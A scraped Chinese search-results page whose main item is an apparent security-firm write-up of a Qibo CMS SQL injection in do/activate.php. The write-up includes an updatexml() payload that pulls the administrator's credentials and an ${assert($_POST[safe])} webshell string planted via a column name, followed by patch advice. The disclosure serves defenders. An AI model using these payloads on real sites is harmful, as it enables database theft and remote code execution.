精华内容
下载资源
问答
  • 阿斯科企业建站CMS系统v12.8 ----点击测试工具直接使用    演示地址:http://www.jianzhancms.net/cs/ashike/ 管理地址:admin/login.asp 后台帐号:admin 后台密码:admin2009 部分功能介绍: 一、网站...
  • 天时达企业建站CMS系统v2.9 **************************** 声明:本建站是无任何功能限制 **************************** 管理地址:admin/login.asp 后台帐号:admin 后台密码:admin2009 注意事项: 安装时...
  • 采用 ACTCM 网站管理系统。 ACTCMS是一款具有强大的功能的基于ASP语言的开源内容管理软件,有UTF-8和GB2132两个编码版本,支持ACCESS和MSSQL两种数据库。ACTCMS是一款完全开源的程序,都毫无保留的完全开放源...
  • 8CMS企业网站管理系统(著作权登记号2009SRBJ3516),基于微软asp Access开发,是实用的...不需要懂程序即可完成整站功能嵌套 前台数据输出逻辑层,标签控制 模板分离 每一个页面都有对应的模板页 有利于日后维护升级
  • 齐博cms整站系统,是目前建站系统用的较的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大...

    齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用。

    在对整个网站代码的漏洞检测中发现do目录下的activate.php存在可以插入恶意参数的变量值,我们来看下这个代码:

    b42dae0bbc6f4173b9bcbeea10ed7e55.png

    齐博cms漏洞详情:

    从代码里发现这个代码的功能是发送序列号激活的一个功能,从激活的链接地址里,可以看出do/activate.php?job=activate&safe_id=$safe_id 是用来激活序列号的,我们从整个齐博的代码里找到了账号激活的一个大体的过程,首先会注册一个账号,注册账号后会需要发送邮件到用户的邮箱里,邮箱里验证的是safe_id这个值,这个safe_id这个值经过md5的解密后直接生成uaername跟用户的密码,然后再传入到get_safe()这个函数,在这个inc文件夹下的class.user.php代码里找得到这个函数。

    我们发现这个get_safe()函数是用来传递用户的激活信息,并进行安全过滤与判断的,从这里我们可以插入恶意的sql语句到网站后端里去,并直接到数据库中执行该语句,我们本地来测试一下是否可以sql注入:

    3564471b75864333ab34b434d54ff131.png

    从上图我们可以看出可以进行网站sql注入攻击,那么我们就可以进行查询数据库的账号密码操作,比如查询网站超级管理员的账号密码:and (updatexml(1,concat(0x7e,(substring((selectusername from qb_memberdata where groupid=3),1, 这个语句就是查询超级管理员的账号密码,通过这里我们查到网站的管理员账号密码,登录后台,我们进行远程代码提权了。

    741588419fe849208d9b85abfe109f0c.png

    增加栏目为${assert($_POST[safe])},一句话后门的代码会直接写入到/data/guide_fid.php文件,用一句话木马连接工具连接即可。

    关于齐博cms漏洞的修复,我们SINE安全建议网站的运用者,尽快升级齐博CMS到最新版本,对于sql注入语句进行安全过滤与sql注入防护,对网站的后台默认地址进行详细的更改为其他的文件名。对于前端网站进行sql语句查询的时候进行网站安全白名单系统部署,网站后台的账号密码设置的复杂一些,尽可能的用数字+大小写+特殊字符组合。

    展开全文
  • 1.整站可以通过后台设置为显示动态页面或生成纯静态页面; 2.每个页面都可以设置标题、关键词、描述等属性; 3.内链功能可以通过后台控制详细内容中的关键词链接,更有效的增加SEO效果; 二、完善的自定义模型...
  • 9.提供工具转换网站为utf-8编码,以实现多语言显示 10.会员功能,会员注册经审核并激活账号后生效,会员可以推荐新闻会员属于会员组,可设置指定会员组有权阅读新闻,可设置会员有效期,会员虚拟 币和积分,可限制...
  • 多语言:这是一个多语言系统!你可以添加任何其他语言。多风格:多模版、多样式、便于推广、促销。栏目:支持多级栏目,支持内容绑定分类。SEO优化:遵循SEO标准,每个内容页面均有seo优化功能,且都静态化。伪静态...
  • 九、内置数据库备份功能,可一键轻松完成整站数据库备份,保证数据的安全; 十、可直接根据后台栏目设置管理员权限及操作权限功能,从而可以实现网站栏目及内容多人独立管理,传文件夹及文件管理功能,可以轻松管理...
  • 同时提供GBK和UTF-8软件包,用户可以根据需要把模板和语言包翻译成其他语言,为多语言环境的开发提供了便利,助你的站点迈向世界。 17 、支持多级管理权限控制,让网站多人维护更轻松 系统支持按频道和模块分别...
  • 16、修改专题为整站专题,每个模型都可以设置专题; 17、修改替换系统在线编辑器选用ckeditor编辑器,兼容性强,操作简单! 18、全面修改会员系统,优化功能及会员权限; 19、修复其他细节问题;
  • 多语言:这是一个多语言系统!你可以添加任何其他语言。 多风格:多模版、多样式、便于推广、促销。 栏目:支持多级栏目,支持内容绑定分类。 SEO优化:遵循SEO标准,每个内容页面均有seo优化功能,且都静态化。 伪...
  • 1、系统支持整站生成HTML静态和动态ASP 整个系统都可以生成静态HTML,有效的提高了系统的性能,不仅减轻服务器的负载提高搜索收录率,增加网站收录。同时也可以实现内容访问权限控制。 超多种生成文件命名形式可供...
  • 42.网站内置广告位,不同栏目可绑定不同的广告,并可一次更换整站广告 43.可切换简体/繁体,并可设置默认语言 44.支持语言包 45.网站内容评论功能,可设置是否审核/仅限会员等 46.对于智能手机访问网站用户,会...
  • 多语言:这是一个多语言系统!你可以添加任何其他语言。 多风格:多模版、多样式、便于推广、促销。 栏目:支持多级栏目,支持内容绑定分类。 SEO优化:遵循SEO标准,每个内容页面均有seo优化功能,且都静态化。 ...
  • phpscup v1.1 Beta GBK.rar

    2019-07-16 02:58:59
    多语言:这是一个多语言系统!你可以添加任何其他语言。 多风格:多模版、多样式、便于推广、促销。 栏目:支持多级栏目,支持内容绑定分类。 SEO优化:遵循SEO标准,每个内容页面均有seo优化功能,且都...
  • YYjia应用市场网站系统页面设计精美,用户访问体验超级好,对搜索引擎收录友好,整站静态,访问速度快,后台傻瓜式操作,智能简单,是建立一个app应用下载站最佳程序。   全面覆盖平台 基于PHP MYSQL开发的...
  • 自主开发的模板引擎,可以任意支持整站纯静态、asp动态数据库输出,用户可以根据自己服务器或虚拟主机的特点,选择相应的模式减少服务器负载! 六、灵活便捷的SEO设置 能够通过后台自定义各类关键字、自动生成...
  • 九、内置数据库备份功能,可一键轻松完成整站数据库备份,保证数据的安全; 十、可直接根据后台栏目设置管理员权限及操作权限功能,从而可以实现网站栏目及内容多人独立管理,传文件夹及文件管理功能,可以轻松管理...
  • 自主开发的模板引擎,可以任意支持整站纯静态、asp动态数据库输出,用户可以根据自己服务器或虚拟主机的特点,选择相应的模式减少服务器负载! 六、灵活便捷的SEO设置 能够通过后台自定义各类关键字、自动生成...
  • 多语言网站构建 产品相册 多附件 更新网站模板,采用全新架构及DIV CSS 更新系统模板解析核心模块 SmartSite智能网站管理系统简介 智能网站管理系统( SmartSite )是由仙人掌软件基于asp access环境下开发的...
  • B2Bbuilder也是目前国内用户最多,功能齐全,性能好,最易使用的B2B系统,也是唯一家支持多语言版本的软件系统。行业首选品牌企业,一切有保障。 B2Bbuilder(B2B电子商务网站) 7.0.1 更新内容: 1.产品搭配销售...
  • (1)整站生成html静态网页,网页打开速度快,更有力于搜索引擎收录。 (2)支持div css主题制作方案,代码更简洁,打开速度更快。 (3)自动生成sitemap.xml 加速Google、baidu等知名搜索引擎的收录速度。 (4)主题设计...
  • ✅ 聚享导航:方便、简洁、快速的自定义网址导航 - 更介绍 2020年3月1号添加 Tristan(北京) - Github, 博客 ✅ 土味情话生成器:土味情话,定制生成 - 更介绍 ✅ 静心呼吸调节器:通过视觉反馈在线...
  • 并发和异步编程 - 线程 / 进程 / 异步IO / async和await Day21~30 - Web前端入门 用HTML标签承载页面内容 用CSS渲染页面 用JavaScript处理交互式行为 jQuery入门和提高 Vue.js入门 Element的使用 Bootstrap...

空空如也

空空如也

1 2
收藏数 27
精华内容 10
关键字:

多语言整站cms